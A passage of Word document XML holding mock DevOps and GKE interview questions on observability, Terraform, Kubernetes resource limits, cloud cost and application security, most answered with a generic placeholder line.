    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/mTLS</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Q22. How much experience do you have with Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Prometheus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much experience do you have with Prometheus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How much experience do you have with Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Grafana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much experience do you have with Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How much experience do you have with OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/OpenTelemetry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much experience do you have with OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Have you worked with Jaeger?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Tracing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Tracing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Jaeger?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. Have you integrated ELK?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Logging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integrated ELK?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. What is Terraform State?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Terraform State?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Why is Terraform State a security risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Security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is Terraform State a security risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. How do you manage state locking in a team environment?</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state locking in a team environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. What is a Terraform Module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Terraform module is a reusable, self-contained group of resource definitions with input variables and outputs, called from other configurations to avoid duplicating the same infrastructure pattern repeatedly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. When should you use a Terraform Module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Modules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should you use a Terraform Module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How do you handle secret injection in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/Secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/Secrets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secret injection in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is idempotency in Ansible?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idempotency in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. Have you worked in environments with compliance requirements like PCI DSS, GDPR, or SOC 2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Compliance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in environments with compliance requirements like PCI DSS, GDPR, or SOC 2?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. What was your role in meeting those compliance requirements?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Compliance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your role in meeting those compliance requirements?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. Are all three of your cloud certifications still valid?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Certifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Certifications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Are all three of your cloud certifications still valid?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. How is your experience with MLOps and AI infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI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your experience with MLOps and AI infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. What kind of MLOps or AI infrastructure work have you done?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI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MLOps or AI infrastructure work have you done?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 73 - Senior GKE Architecture Resource Security and Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Talk in detail about your core roles and responsibilities in your current role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Role/Responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Role/Responsibilities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Talk in detail about your core roles and responsibilities in your current role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Can you explain your current project using a specific client or application as an example?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Project Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Project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your current project using a specific client or application as an example?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Explain the infrastructure architecture of one application from end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Project Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Project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infrastructure architecture of one application from end to end.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Where does this application run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Runtime Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Runtime Platform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does this application run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are all the infrastructure components required for this application to run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure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all the infrastructure components required for this application to run?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Who decides the CPU and memory limits for the application?</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Who decides the CPU and memory limits for the application?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you determine the CPU and memory requests and limits?</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determine the CPU and memory requests and limits?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Does the application team also approve the resource sizing because of the cloud cost?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud Cost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Cloud Cost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the application team also approve the resource sizing because of the cloud cost?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What resource quotas or limits do you configure in a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Quotas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Quotas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resource quotas or limits do you configure in a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How do CPU requests and limits work in Kubernetes?</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CPU requests and limits work in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What happens if a container exceeds its memory limit?</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container exceeds its memory limit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. What happens if a container exceeds its CPU limit?</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container exceeds its CPU limit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What is the difference between CPU utilization and memory utilization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Systems/Resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Systems/Resources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CPU utilization and memory utilization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How is memory different from disk storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Systems/Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Systems/Storage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memory different from disk storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What monitoring tools do you use for the application and infrastructure?</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monitoring tools do you use for the application and infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Apart from native GCP monitoring, what third-party monitoring tools do you use?</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Apart from native GCP monitoring, what third-party monitoring tools do you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What does Prisma Cloud monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Prisma Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Prisma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Prisma Cloud monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Does Prisma monitor IAM security and network security only, or does it also cover application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Prisma Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Prisma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Prisma monitor IAM security and network security only, or does it also cover application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Have you worked on application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application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application security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. Have you worked on penetration testing or vulnerability assessment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application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penetration testing or vulnerability assessment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Can you give an example of an application security vulnerability that you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Application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give an example of an application security vulnerability that you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. What are some important HTTP security headers that should be present?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Web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some important HTTP security headers that should be present?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. What does Content Security Policy (CSP) do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Web Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
